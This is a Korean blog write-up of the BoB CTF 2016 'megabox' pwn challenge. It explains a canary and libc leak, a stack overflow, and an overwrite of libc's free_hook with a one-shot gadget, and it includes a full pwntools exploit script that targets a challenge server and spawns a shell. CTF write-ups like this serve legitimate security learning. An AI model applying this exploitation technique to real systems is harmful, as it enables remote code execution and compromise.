## BoB CTF_2016(megabox,pwn)
[Summary]
1. memory leak이 간단하고 canary와 libc's base addr을 Leak해야함.
2. clone()함수로 sandbox를 걸어놓음. -> sandbox escape(?)를 해야함.
3. FULL RELRO가 걸려있어 got overwrite가 불가능
4. libc의 got overwrite는 가능한데 free함수를 사용할 경우 free_hook의 got를 realloc함수를 사용할 경우
realloc_hook의 got를 overwrite해야함.
[Analysis]
- (https://drive.google.com/open?id=0B12bAVEUfDg7bjhNU1J2ZTZOOHc) - (megabox binary)
- (https://drive.google.com/open?id=0B12bAVEUfDg7NExKLTdRaWNfTHM) - (libc binary)
[그림 1] - main()함수 hex-ray
IDA를 이용하여 [그림 1]과 같이 바이너리를 뜯어보면 clone()함수로 fn이라는 함수를 sandbox에 넣어 동작시키는 것을 알 수 있다.
처음에는 이게 sandbox인 것조차 알지 못하고 대회때는 풀지 못했다.
mmap()으로 0x41410000영역에 커스텀 스택의 ret를 간단하게 rop를 하여 one-shot가젯을 쓸 수 있을 거라 생각했는데
그게 아니었다. sandbox에 막혔다.
그리고 보호기법은 Full RELRO였기 때문에 got overwrite가 불가능 했고, 따라서 libc의 got를 덮어쓸 수 있었다.
아래 [그림 2]와 같이 조금 자세히 fn을 보면 1번 메뉴를 통해 커스텀 스택에 bof가 터지는게 너무 눈에 띄게 취약점이 보였고,
2번 메뉴를 통해 Memory Leak을 할 수 있었는데 canary와 ret에 저장되어있는 clone+109의 주소를 릭해서 libc의 base addr를
구할 수 있었고, 이를 통해 libc의 free_hook의 got를 oneshot가젯의 주소로 덮어씌워서 exploit이 가능했다.
[그림 2] - fn()함수
[Exploit Code] - megabox_exploit.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 | from pwn import * import hexdump import struct context(arch='i686', os='linux') #local=False local=True if local: p = process("./megabox_patch") else: p = remote("52.34.185.58", 10001) binary = ELF("./megabox") raw_input() payload = "A"*136 oneshot_offset = 0x4647C #libc_free_got_offset = 0x3BDF98 #libc_free_got_offset = 0x3BE060 libc_free_hook_got_offset = 0x3C0A10 #wjret = 0x4141414141414141 gets_plt = 0x4009C0 poprdi_offset = 0x22b9a #read_plt = 0x400980 #printf_plt = 0x400960 canary_leak = ''; oneshot_addr = ''; poprdi_addr = ''; libc_free_hook_got_addr = ''; clone_109 = '' def write_feedback(feedback): p.recv(1024); p.send('1\n'); sleep(0.5) p.recv(1024) p.send(feedback+'\n'); sleep(0.5) def read_feedback(debug_level=0): global canary_leak,oneshot_addr,poprdi_addr,libc_free_hook_got_addr,clone_109 p.recvuntil('menu>>> '); p.send('2\n'); sleep(0.5) p.recvuntil('oops!!\n') stack_leak = p.recv(1024) canary_leak = stack_leak[136:144] clone_109 = stack_leak[152:160] canary_leak = u64(canary_leak) clone_109 = u64(clone_109) libc_base_addr = clone_109-0xfa37d libc_free_hook_got_addr = libc_base_addr + libc_free_hook_got_offset oneshot_addr = libc_base_addr + oneshot_offset poprdi_addr = libc_base_addr + poprdi_offset #canary_leak = struct.unpack("L", canary_leak) #clone_109_leak = struct.unpack("L", clone_109) if debug_level == 1: hexdump.hexdump(stack_leak[:176]) print "[+] canary's addr : " + hex(canary_leak) print "[+] clone+109's addr : " + hex(clone_109) print "[+] gets's plt addr : " + hex(gets_plt) print "[+] libc_base's addr : " + hex(libc_base_addr) print "[+] libc's free_hook got addr : " + hex(libc_free_hook_got_addr) print "[+] oneshot's addr : " + hex(oneshot_addr) print "[+] poprdi's addr : " + hex(poprdi_addr) #################### Init ###################### p.recvuntil('your name... ') p.send('wjdebug\n'); sleep(0.5) #################### stage 1 ################## # Memory Leak Vuln # ############################################### write_feedback(payload) read_feedback(1) #################### stage 2 ################## # overwrite libc's free_got to oneshot gadget # ############################################### #stage2_payload = payload+p64(canary_leak)+p64(0)+p64(poprdi_addr)+p64(libc_free_got_addr)+p64(oneshot_addr) stage2_payload = payload stage2_payload += p64(canary_leak) stage2_payload += p64(0) stage2_payload += p64(poprdi_addr) stage2_payload += p64(libc_free_hook_got_addr) stage2_payload += p64(gets_plt) stage2_payload += p64(clone_109) write_feedback(stage2_payload) ################### stage 3 ################### # Exploit ~~~~~~~~~~!!! # ############################################### p.recv(4096); p.send('3\n'); sleep(0.5) # vuln trigger p.send(p64(oneshot_addr)+'\n') # input gets's arg p.interactive() | cs |
[Get Shell~~!!!!]
[그림 3] 쉘 획득~!
끝~!
ps) Thanks to s0ngsari(s0ngsari.tistory.com)
'CTF writeup' 카테고리의 다른 글
| [Codegate CTF_2017] BabyMISC(MISC) (0) | 2017.02.18 |
|---|---|
| [Christmas CTF_2016] who is solo(pwn) (8) | 2017.01.17 |
| [Christmas CTF_2016] StupidRSA(misc) (0) | 2016.12.26 |
| [Christmas CTF_2016] NMS(misc) (0) | 2016.12.26 |
| [Holyshield CTF_2016] pwnme(pwn) (0) | 2016.12.26 |
